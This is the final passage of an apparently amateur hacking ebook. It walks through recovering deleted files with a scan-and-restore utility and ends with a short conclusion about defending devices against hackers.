[Screenshot: Select Volume dialog listing the logical volumes (type, file system, size) and the scan mode choice. ‘Quick Scan’ uses the standard scan method to search for deleted files; ‘Deep Scan’ uses advanced scanning techniques and hence takes more time to search.] 


After that it scans for all the deleted files/folders on the selected local drive and shows you the list of all the folders from which files were deleted. 




Then you have to select the deleted file/folder which you want to recover; here I have selected “hacking tools” from the folder “vi”. 

And then click on the recover option to recover your data successfully. 


Note: - The recovered data 
will work only when the 
address of that location is 
empty/not overwritten from 
where that file/folder is 


CONCLUSION: 


Thanks for reading this book. I hope the contents described in this book will help you to know the intents of hackers. Now you are capable of securing your own and your surrounding computers, mobile phones and other networks from the threat we call “HACKING An art of exploitation”. 